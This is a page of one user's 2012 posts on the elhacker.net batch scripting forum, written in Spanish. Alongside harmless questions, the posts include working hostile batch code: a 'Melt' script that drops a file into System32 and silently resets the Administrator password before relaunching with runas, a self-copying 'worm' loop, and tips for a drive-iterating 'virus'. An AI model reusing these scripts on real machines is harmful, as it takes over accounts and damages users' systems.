elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a Git (Primera Parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13
61  Programación / Scripting / Re: [BATCH] Virus raro. ¿Funcionaria? en: 23 Diciembre 2012, 22:16 pm
Tambien un ">NUL 2>&1" (Sin las comillas) para evitar que aparezca error al no detectar un disco.
No entendi, ¿Si usa el IF no deberia de ahorrarse el mensaje de error?
62  Programación / Scripting / Re: [BATCH/¿APORTE?] Contraseña para entrar en carpetas. en: 23 Diciembre 2012, 21:27 pm
Un poco inutil quizas, lo bueno estaria en crear un batch que comprobase si la carpeta se abre, y si la abren que pida contraseña o la cierra. Aunque ni siquiera se si eso se podria hacer.
63  Programación / Scripting / Re: [BATCH] Virus raro. ¿Funcionaria? en: 23 Diciembre 2012, 21:22 pm
En vez de ir letra a letra en el codigo, usa un bucle FOR, y pon un IF EXIST por si acaso no existe la unidad. Algo asi como:
Código:
FOR %%A IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO (IF EXIST "%%A:\" "Aqui la primera orden que quieras poner"&&"Aqui la segunda orden que quieras poner")
Y en las ordenes en vez de poner C, D o E, pones %%A y se ira sustituyendo por cada una de las letras.

PD: Las ordenes sin comillas, ¿Eh?
64  Programación / Scripting / Re: [BATCH] [RESUELTO] Problema con tokens en comando FOR /F en: 23 Diciembre 2012, 15:10 pm
Gracias  ;D
65  Programación / Scripting / [BATCH] [RESUELTO] Problema con tokens en comando FOR /F en: 23 Diciembre 2012, 14:25 pm
He buscado pero no encuentro como solucionar el problema. Cuando voy a la linea de comandos e introduzco
Código:
FOR /F "tokens=3*" %A IN ("HOLA QUE TAL ESTAS") DO (echo %A)
Me responde solo "TAL" en vez de "TAL ESTAS". Tambien he probado con "tokens=1,3" y con "tokens=1-3" pero en ambos casos solo me responde "HOLA" en vez de "HOLA TAL" y "HOLA QUE TAL". He buscado en varias paginas y en la ayuda del comando FOR pero no encuentro nada diferente.  Tambien he probado lo mismo en mis dos ordenadores y en una maquina virtual (Los ordenadores Win7 y WinXP, la maquina virtual WinXP), pero el resultado es el mismo. Gracias de antemano.
66  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 23 Diciembre 2012, 11:31 am
¿ En serio te parece que hay que saber algo de informática para darle al botón ejecutar y escribir "taskmgr", o reiniciar el equipo y seleccionar la opción "Modo seguro" ? xD
Bueno, saber relativamente. He visto a mucho gente que ni sabe lo que es el modo seguro ni saben para que sirve el boton ejecutar. Incluso he llegado a ver gente que llevan a reparar el pc por una de estas jodas en batch y similares. Asi que si, algo si que hay que saber  :xD
67  Programación / Scripting / Re: [Reto Batch] Melt ($Edu$) en: 23 Diciembre 2012, 11:06 am
Menuda cagada entonces. Ahora luego intentare volverlo a hacer
Pero de todas formas te complicaste mucho, no pido nada de si tiene permisos o no, tiene que andar en un usuario Administrador simplemente, sin complicaciones.
Es que fue leer el "cuidado con los posibles bugs" y me vinieron a la cabeza todos esos Accesos denegados al copiar a System32 o modificar claves del registro :xD
68  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 23 Diciembre 2012, 11:04 am
Abres el administrador, y cierras el proceso. Y si ya tienes muchos abiertos, entras en modo seguro y punto, buscas que se inicia algo sospechoso.


Poco cracking veo yo aqui jaja
Para hacer algo asi hay que saber de informatica, y no creo que algo tan simple vaya dirigido a alguien que sepa  :xD


69  Programación / Scripting / Re: [Reto Batch] Melt ($Edu$) en: 22 Diciembre 2012, 21:23 pm
Bueno, en el objetivo decian que no pudiese haber ningun error, asi que hago la comprobacion de los permisos que tiene el archivo y si da "Acceso denegado." cambio la contraseña del Administrador y uso el comando runas.
Código:
@ECHO OFF
FOR /F %%A IN ('echo H^>C:\Windows\System32\H.n') DO IF "%%A"=="Acceso denegado." (GOTO :NO) else DEL "C:\Windows\System32\H.n"
echo @ECHO OFF>C:\Windows\System32\copia.bat
echo DEL %~f0>>C:\Windows\System32\copia.bat
echo echo Hola estoy en %%~f0>>C:\Windows\System32\copia.bat
echo pause>>C:\Windows\System32\copia.bat
echo exit>>C:\Windows\System32\copia.bat
cmd /k "C:\Windows\System32\copia.bat"
exit

:NO
(echo HOLA&echo HOLA)|net user Administrador *&(echo HOLA)|runas /netonly /user:Administrador@%USERDOMAIN% %0
exit
A ver que tal  ;D
70  Programación / Scripting / Re: [BATCH] Worm. ¿Funcionaria? en: 22 Diciembre 2012, 20:36 pm
Código
  1. @echo off
  2.  
  3. For /L %%# in (1,1,999999999999999999) do (
  4. CLS
  5. SET /A "Contador+=1"
  6. (Call Copy /Y "%~0" "%%RANDOM%%%%RANDOM%%%%RANDOM%%.bat" 1>NUL)
  7. Call Echo %%CONTADOR%% archivos creados...
  8. )
  9.  

Me gusto el detalle de "archivos creados"  :xD.
Páginas: 1 2 3 4 5 6 [7] 8 9 10 11 12 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines